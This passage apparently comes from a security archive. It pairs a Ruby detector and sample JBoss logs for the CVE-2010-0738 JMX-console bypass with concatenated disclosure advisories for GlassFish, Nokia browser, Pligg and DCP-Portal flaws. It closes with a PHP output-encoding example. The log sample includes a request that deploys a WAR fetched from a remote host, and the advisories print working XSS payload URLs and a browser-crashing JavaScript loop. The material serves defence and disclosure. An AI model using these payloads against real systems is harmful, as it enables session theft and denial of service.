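  10.0.0.5 - - [19/Oct/2010:22:24:33 +0000] "GET /jmx-console/ HTTP/1.1" 401 1234
  10.0.0.5 - - [19/Oct/2010:22:24:34 +0000] "HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1" 200 -
  10.0.0.5 - - [19/Oct/2010:22:24:35 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=http://10.0.0.5:8080/xkq2.war HTTP/1.1" 200 -
  192.168.1.20 - admin [19/Oct/2010:22:30:01 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 5120
  192.168.1.20 - admin [19/Oct/2010:22:30:02 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1" 200 8812
  10.0.0.5 - - [19/Oct/2010:22:24:40 +0000] "HEAD /xkq2/aB3dE9.jsp HTTP/1.1" 200 -
LOG

# client ident user [timestamp] "METHOD URI PROTO" status
LOG_RE = /\A(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/

Finding = Struct.new(:client, :rule, :uri)

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { client: m[1], user: m[2], method: m[4], uri: m[5], status: m[6].to_i }
end

def analyse_jmx_log(text, console_path: '/jmx-console')
  findings = []
  text.each_line do |line|
    req = parse_line(line)
    next unless req && req[:uri].start_with?(console_path + '/')
    _path, query = req[:uri].split('?', 2)
    params = CGI.parse(query.to_s)   # missing keys read as []

    # Rule 1: the console's security constraint only listed GET and POST, so
    # any other verb that gets a 2xx from it went past authentication.
    if !%w[GET POST].include?(req[:method]) && (200...300).cover?(req[:status])
      findings << Finding.new(req[:client], 'verb-tampering bypass (CVE-2010-0738)', req[:uri])
    end

    # Rule 2: MainDeployer.deploy asked to fetch an archive from a URL.
    if params['action'].include?('invokeOpByName') &&
       params['name'].any? { |n| n.include?('MainDeployer') } &&
       params['methodName'].include?('deploy')
      findings << Finding.new(req[:client], "MainDeployer.deploy from #{params['arg0'].first}", req[:uri])
    end
  end
  findings
end

if __FILE__ == $0
  analyse_jmx_log(SAMPLE_LOG).each { |f| puts "#{f.client} #{f.rule} #{f.uri}" }
end
```

POST bodies are not written to access logs, so the second rule only sees the GET and HEAD variants; catching the module's default POST needs request body logging or an inline proxy. On the server the fix for the bypass was to drop the http-method elements from the jmx-console security-constraint in web.xml so it covers every verb, and to password-protect or remove the console altogether.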
Sense of Security/Oracle Sun GlassFish Enterprise Server Stored XSS Vulnerability ( jsp)
Sense of Security - Security Advisory - SOS-11-009
Release Date. 19-Jul-2011
Last Update. -
Vendor Notification Date. 23-Mar-2011
Product. Oracle Sun GlassFish Enterprise Server
Platform. Java EE
Affected versions. 2.1.1 ((v2.1 Patch06)(9.1_02 Patch12)) (build b31g-fcs) verified and possibly others
Severity Rating. Medium
Impact. Cookie/credential theft, impersonation, loss of confidentiality, client-side code execution
Attack Vector. Remote without authentication
Solution Status. Vendor patch
CVE reference. CVE-2011-2260
Oracle Bug ID. 7030596
Details.
GlassFish is an open source application server project led by Sun
Microsystems for the Java EE platform. The proprietary version is
called Sun GlassFish Enterprise Server. GlassFish supports all Java EE
API specifications, such as JDBC, RMI, e-mail, JMS, web services, XML,
etc, and defines how to coordinate them.
Stored:
The log viewer fails to securely output encode logged values. As a
result, an unauthenticated attacker can trigger the application to log
a malicious string by entering it into the username field. This
causes the application to log the failed login attempt and
results in a stored XSS vulnerability. When an administrator logs into
the application and views the log, the malicious code will be executed
in the administrator's browser. As an example, navigate to:
http://[host]:4848
Enter the below into the login field:
'>"><script>alert(3);</script>
When the user views the "Search Log Files" page, the above client-side
code will be executed in the client browser. The offending script is
http://[host]:4848/logViewer/logViewer.jsf
Reflected:
By modifying the windowTitle or helpFile parameters of
/com_sun_webui_jsf/help/helpwindow.jsf it is possible to trigger a
reflected XSS vulnerability. Examples are shown below:
/com_sun_webui_jsf/help/helpwindow.jsf?&windowTitle=Help+Window'>"><script>alert(1);</script>&helpFile=commontask.html
/com_sun_webui_jsf/help/helpwindow.jsf?&windowTitle=Help+Window&helpFile=commontask.html'>"><script>alert(1);</script>
Solution.
Apply the vendor patch.
Discovered by.
Sense of Security Labs.
About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au/consulting/penetration-testing
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-009.pdf
ikki/Nokia Mini Map Browser (array sort) Silent Crash Vulnerability ( hardware)
====================================================
Security Research Advisory
Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability
Advisory number: LC-2008-04
Advisory URL: http://www.ikkisoft.com
====================================================
1) Affected Software
* Nokia Mini Map Browser (S60WebKit <= 21772)
The tested device has the following User-Agent:
Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75
Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML)
Safari/413
Note: Although the Nokia Web Browser is built upon a port of the
open source WebKit used by Apple for its browser, the iPhone is not
affected (at least the iPhone firmware version 2.0.2(5C1))
====================================================
2) Severity
Severity: Low
Local/Remote: Remote
====================================================
3) Summary
The Web Browser for S60 (formerly called Nokia Mini Map Browser) is a web
browser for the S60 mobile phone platform developed by Nokia.
It is built upon S60WebKit, a port of the open source WebKit project to the S60
platform. According to several sources, the S60 software on Symbian OS is the
world’s most popular software for smartphones.
This version of the Nokia Mini Map Browser does not properly handle JavaScript
embedded in visited HTML pages. An attacker can easily trigger a denial of
service.
References:
http://opensource.nokia.com/projects/S60browser/
http://en.wikipedia.org/wiki/Web_Browser_for_S60
====================================================
4) Vulnerability Details
The Nokia Mini Map Browser is prone to a vulnerability that results in a
silent crash of the application. Arbitrary code execution is probably not possible.
The problem arises in the JavaScript core of the S60WebKit, invoking the sort()
function on a recursive array.
A similar behavior was observed some years ago in several browsers due to
the common code base (BID-12331, BID-11762, BID-11760, BID-11759,
BID-11752).
====================================================
5) Exploit
Embed in an HTML page the following JavaScript:
<script>
foo = new Array();
while(true) {foo = new Array(foo).sort();}
</script>
====================================================
6) Fix Information
n/a
====================================================
7) Time Table
08/09/2008 - Vendor notified.
15/09/2008 - Vendor response.
??/??/???? - Vendor patch release.
10/10/2008 - Public disclosure.
====================================================
8) Credits
Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com
====================================================
9) Legal Notices
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Permission is hereby granted for the redistribution of this alert, provided
that the content is not altered in any way, except reformatting, and that due
credit is given.
This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html
====================================================
# milw0rm.com [2008-10-10]
/Oracle Sun GlassFish Enterprise Server 2.1.1 Cross Site Scripting ( na)
Oracle Sun GlassFish Enterprise Server version 2.1.1 suffers from a cross site scripting vulnerability. Proof of concept code included.
Andrei Rimsa Alvares/Pligg CMS 1.0.4 Cross Site Scripting ( na)
Title: Pligg Installation File XSS Vulnerability
Vendor: Pligg
Product: Pligg CMS
Tested Version: 1.0.4
Threat Class: XSS
Severity: Medium
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares
===== Description =====
Pligg is prone to an XSS vulnerability in the installation file install/install1.php. The variable "language", obtained from the HTTP request, can be manipulated to execute JavaScript code via onmouseover-style event handler attributes. Even with the two sanitizers used (strip_tags and addslashes) it is possible to break out of the double-quoted value attribute of the input tag by passing a double quote in the "language" variable.
----- install/install1.php -----
20:
----- install/install1.php -----
The sanitizer strip_tags prevents new tags from being introduced, but it does not filter onmouseover-type attacks. addslashes inserts backslashes to escape special characters such as the double quote, but since HTML does not process backslash escape sequences this sanitizer is useless for preventing the break-out from the double-quoted attribute, regardless of whether magic_quotes is enabled or not.
===== Impact =====
Malicious JavaScript code can be executed in the context of the affected web site.
===== Proof of Concept =====
A simple proof of concept demonstrating the break-out from the double-quoted attribute is shown below. However, this attack is not exploitable on its own because the input field is hidden.
http://target/install/install1.php?language=%22%20onmouseover=alert()%3E
To overcome this limitation and provide a realistic attack scenario, we used a technique obtained from [1]. This attack enlarges the affected input field so that it covers the whole screen. Once the mouse is moved anywhere on the screen, the onmouseover handler fires and executes the malicious code. In this proof of concept, an alert containing the message "XSS" should be shown on the screen when the mouse moves.
http://target/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E
This attack vector, as exploited in this proof of concept, had no effect on the Google Chrome web browser, but was successfully exploited on Mozilla Firefox and others.
===== Workaround =====
Remove the installation directory after installation, as recommended during installation.
===== Disclosure Timeline =====
June 16, 2010 - Vendor notification.
June 22, 2010 - Vendor replied but did not acknowledge the bug.
June 22, 2010 - New contact attempted to provide more details about the bug.
July 07, 2010 - No vendor reply. Public disclosure.
===== References =====
1. http://www.packetstormsecurity.org/papers/bypass/workaround-xss.txt
2. http://www.pligg.com
Pligg CMS version 1.0.4 suffers from a cross site scripting vulnerability.
Andrei Rimsa Alvares/DCP-Portal 7.0 Beta Cross Site Scripting ( na)
Title: DCP-Portal Multiple XSS Vulnerabilities
Vendor: Worxware
Product: DCP-Portal
Tested Version: 7.0beta
Threat Class: XSS
Severity: High
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares
===== Description =====
Multiple XSS vulnerabilities were found in DCP-Portal.
1. common/components/editor/insert_image.php, modules/newsletter/insert_image.php, php/editor.php
The variable $upload_failure_report receives user input from the HTTP GET request variable "Image" when the action of deleting an uploaded file fails. Later this variable is output to the page without proper sanitization.
2. modules/gallery/view_img.php
The page title can be modified by changing the HTTP request variable "imgtitle". Since no sanitizer is used, an XSS occurs on line 2.
Another vulnerability exists if magic quotes are turned off. The HTTP request variable "imagename" is output inside the JavaScript function document.write, between single quotes, on line 27.
3. modules/tips/show_tip.php
The HTTP request variable "newsId" is output to the page without proper sanitization on line 14.
===== Impact =====
Malicious JavaScript code can be executed in the context of the affected web site.
===== Proof of Concept =====
All proofs of concept display a JavaScript alert containing the message "XSS".
1. common/components/editor/insert_image.php, modules/newsletter/insert_image.php, php/editor.php
http://target/common/components/editor/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://target/modules/newsletter/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://target/php/editor.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
2. modules/gallery/view_img.php
http://target/modules/gallery/view_img.php?imgtitle=%3C/title%3E%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
(requires magic_quotes_gpc = off)
http://target/modules/gallery/view_img.php?imagename=%22');window.alert('XSS');document.write('%22
3. modules/tips/show_tip.php
http://target/modules/tips/show_tip.php?newsId=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
===== Workaround =====
No workaround available at the time.
===== Disclosure Timeline =====
June, 16 2010 - Vendor notification.
July, 07 2010 - No vendor reply. Public disclosure.
===== References =====
http://www.dcp-portal.org
http://www.worxware.com
DCP-Portal version 7.0 Beta suffers from a cross site scripting vulnerability.
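As an added example (not code from Pligg, DCP-Portal or the advisories' author), the following PHP contrasts the strip_tags()/addslashes() pattern the Pligg advisory describes with output encoding matched to each output context the two advisories cover: HTML attribute, page title, and JavaScript string literal. The function names and the probe inputs are constructed for illustration.

```php
<?php
// Added example, not code from Pligg or DCP-Portal: why the sanitizers named in
// the advisories fail, and the context-specific encoding that fixes each case.

// Pligg install1.php pattern as described: strip_tags() removes tags and
// addslashes() backslash-escapes quotes, but the value is then placed inside a
// double-quoted HTML attribute. The HTML parser does not interpret backslash
// escapes, so a " in the input still terminates the attribute value.
function language_field_vulnerable(string $language): string {
    $value = addslashes(strip_tags($language));
    return '<input type="hidden" name="language" value="' . $value . '">';
}

// Fix: encode for the HTML attribute context. ENT_QUOTES converts both quote
// characters to entities, so nothing in $language can close the attribute.
function language_field_safe(string $language): string {
    $value = htmlspecialchars($language, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="language" value="' . $value . '">';
}

// DCP-Portal view_img.php "imgtitle" pattern: raw request data in <title>.
// The same HTML encoding keeps a </title> or <script> sequence from being
// parsed as markup.
function page_title_safe(string $imgtitle): string {
    return '<title>' . htmlspecialchars($imgtitle, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</title>';
}

// DCP-Portal "imagename" pattern: request data inside a quoted string literal
// in document.write(). This is a JavaScript string context, so HTML encoding
// is the wrong tool; json_encode() emits a correctly quoted JS literal, and the
// JSON_HEX_* flags escape < > ' " & as \uXXXX so the value can neither close
// the literal nor contain a </script> that ends the script block.
// Assumes valid UTF-8 input (json_encode() returns false otherwise).
function image_script_safe(string $imagename): string {
    $literal = json_encode($imagename, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
    return '<script>document.write(' . $literal . ');</script>';
}

// Constructed probe in the shape the Pligg advisory describes: a double quote
// followed by an event-handler attribute name. Compare the two renderings: the
// vulnerable one carries the backslash into the HTML but the quote still ends
// the attribute, the safe one keeps the whole string inside value="...".
$probe = '" onmouseover=x';
echo language_field_vulnerable($probe), PHP_EOL;
echo language_field_safe($probe), PHP_EOL;
echo page_title_safe('</title><b>'), PHP_EOL;
echo image_script_safe("O'Brien </script>"), PHP_EOL;
```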